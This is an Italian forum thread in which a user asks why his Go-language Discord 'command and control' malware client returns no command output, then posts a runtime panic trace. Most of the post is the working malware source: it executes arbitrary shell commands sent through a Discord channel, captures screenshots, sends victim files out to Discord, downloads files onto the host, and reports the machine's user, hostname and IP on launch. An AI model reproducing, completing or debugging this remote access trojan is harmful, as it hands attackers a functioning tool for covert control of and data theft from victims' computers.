Domanda Malware Errore nella programmazione di un discord command and control

Ordina per data Ordina commenti per reazioni
M

monnezzza

Utente Silver
11 Marzo 2021
119
23
53
86
Ultima modifica:
Praticamente quando lo script parte viene online e crea il canale della sessione per il malware, e invia il messaggio iniziale ma non ricevo l'output di nessun comando.
Ho provato su Windows, Linux e android
Nessuno funziona.
Aiuto

Codice: 
package main

import (
    "fmt"
    "image/png"
    "io"
    "os"
    "os/signal"
    "os/exec"
    "os/user"
    "math/rand"
    "net"
    "net/http"
    "runtime"
    "strings"
    "syscall"
    "time"

    "github.com/kbinani/screenshot"
    "github.com/bwmarrin/discordgo"
)

var myChannelId string // Global variable

func getTmpDir() string {
    if runtime.GOOS == "windows" {
        return "C:\\Windows\\Tasks\\"
    } else {
        return "/tmp/"
    }
}

func handler(s *discordgo.Session, m *discordgo.MessageCreate) {
    // Ignores messages in other channels and own messages
    if m.ChannelID != myChannelId || m.Author.ID == s.State.User.ID {
        return
    }

    s.MessageReactionAdd(m.ChannelID, m.ID, "🕐") // Processing...
    flag := 0

    //Run command
    if strings.HasPrefix(m.Content, "c") {
        var cmd *exec.Cmd
        if runtime.GOOS == "windows" {
            cmd = exec.Command("C:\\Windows\\System32\\cmd.exe", "/k", m.Content[14:len(m.Content)])
        } else {
            cmd = exec.Command("/bin/bash", "-c", m.Content[14:len(m.Content)])
        }
        out, err := cmd.CombinedOutput()
        if err != nil {
            out = append(out, 0x0a)
            out = append(out, []byte(err.Error())...)
        }

        // Message is too long, save as file
        if (len(out) > 2000-13) {
            f, _ := os.CreateTemp(getTmpDir(), "*.txt")
            f.Write(out)
            fileName := f.Name()
            f.Close()

            f, _ = os.Open(fileName)
            defer f.Close()
            fileStruct := &discordgo.File{Name: fileName, Reader: f}
            fileArray := []*discordgo.File{fileStruct}
            s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
        } else {
            var resp strings.Builder
            resp.WriteString("```bash\n")
            resp.WriteString(string(out) + "\n")
            resp.WriteString("```")
            s.ChannelMessageSendReply(m.ChannelID, resp.String(), m.Reference())
        }
        flag = 1
    } else if m.Content == "s" {
        n := screenshot.NumActiveDisplays()
        for i := 0; i < n; i++ {
            bounds := screenshot.GetDisplayBounds(i)
            img, _ := screenshot.CaptureRect(bounds)

            fileName := fmt.Sprintf("%s%d_%dx%d.png", getTmpDir(), i, bounds.Dx(), bounds.Dy())
            file, _ := os.Create(fileName)
            png.Encode(file, img)
            defer file.Close()

            f, _ := os.Open(fileName)
            defer f.Close()
            fileStruct := &discordgo.File{Name: fileName, Reader: f}
            fileArray := []*discordgo.File{fileStruct}
            s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
        }
        flag = 1
    } else if strings.HasPrefix(m.Content, "d") {
        fileName := m.Content[5:len(m.Content)]
        f, _ := os.Open(fileName)
        fi, _ := f.Stat()
        defer f.Close()
        if fi.Size() < 8388608 { // 8MB file limit
            fileStruct := &discordgo.File{Name: fileName, Reader: f}
            fileArray := []*discordgo.File{fileStruct}
            s.ChannelMessageSendComplex(m.ChannelID, &discordgo.MessageSend{Files: fileArray, Reference: m.Reference()})
            flag = 1
        } else {
            s.ChannelMessageSendReply(m.ChannelID, "File is bigger than 8MB 😔", m.Reference())
        }
    } else if strings.HasPrefix(m.Content, "u") {
        path := m.Content[7:len(m.Content)]
        if len(m.Attachments) > 0 {
            out, _ := os.Create(path)
            defer out.Close()
            resp, _ := http.Get(m.Attachments[0].URL)
            defer resp.Body.Close()
            io.Copy(out, resp.Body)
            s.ChannelMessageSendReply(m.ChannelID, "Uploaded file to " + path, m.Reference())
        }
        flag = 1
    } else if m.Content == "💀" {
        flag = 2
    }

    s.MessageReactionRemove(m.ChannelID, m.ID, "🕐", "@me")
    if flag > 0 {
        s.MessageReactionAdd(m.ChannelID, m.ID, "✅")
        if flag > 1 {
            s.Close()
            os.Exit(0)
        }
    }
}

func main() {
    dg, err := discordgo.New("Bot: Bot token here") // Hardcoded bot token
    if err != nil {
        // Error creating Discord session
        return
    }

    // Handler for CreateMessage events
    dg.AddHandler(handler)
    dg.Identify.Intents = discordgo.IntentsGuildMessages

    err = dg.Open()
    if err != nil {
        // Error opening connection
        return
    }

    // Create new channel
    rand.Seed(time.Now().UnixNano())
    sessionId := fmt.Sprintf("sess-%d", rand.Intn(9999 - 1000) + 1000)
    c, _ := dg.GuildChannelCreate("server discord id", sessionId, 0) // Guild ID  hardcodedis
    myChannelId = c.ID

    // Send first message with basic info (and pin it)
    hostname, _ := os.Hostname()
    currentUser, _ := user.Current()
    cwd, _ := os.Getwd()
    conn, _ := net.Dial("udp", "8.8.8.8:80")
    defer conn.Close()
    localAddr := conn.LocalAddr().(*net.UDPAddr)
    firstMsg := fmt.Sprintf("Session *%s* opened! 🥳\n\n**IP**: %s\n**User**: %s\n**Hostname**: %s\n**OS**: %s\n**CWD**: %s", sessionId, localAddr.IP, currentUser.Username, hostname, runtime.GOOS, cwd)
    m, _ := dg.ChannelMessageSend(myChannelId, firstMsg)
    dg.ChannelMessagePin(myChannelId, m.ID)

    // Bot is now running (CTRL+C to quit)
    sc := make(chan os.Signal, 1)
    signal.Notify(sc, syscall.SIGINT, syscall.SIGTERM, os.Interrupt, os.Kill)
    <-sc

    dg.Close()
}


Ora abilitando il permesso (tipo la 3 volta) per i messaggi è andato ma da questo errore nell'esecuzione di un comando:
Codice: 
goroutine 31 [running]:
main.handler(0x6d84000, 0x6f79068)
        /data/data/com.termux/files/home/storage/shared/projects/discord-c2/client.go:49 +0x1880
github.com/bwmarrin/discordgo.messageCreateEventHandler.Handle(0x48c20f0, 0x6d84000, {0x48a37b8, 0x6f79068})
        /data/data/com.termux/files/home/go/src/github.com/bwmarrin/discordgo/eventhandlers.go:753 +0x40
created by github.com/bwmarrin/discordgo.(*Session).handle
        /data/data/com.termux/files/home/go/src/github.com/bwmarrin/discordgo/event.go:171 +0x170
exit status 2
 

Allegati

  • Screenshot_20230121-221639.png
    Screenshot_20230121-221639.png
    135.1 KB · Visualizzazioni: 7

DISCUSSIONI SIMILI

C
Domanda aiuto programma
  • 8
  • 509
8
509
C / C++
CyberBerry
M
Domanda Estrare dati dal sorgente Email
  • 0
  • 347
0
347
Python
mrcamarium
Top Bottom
Indietro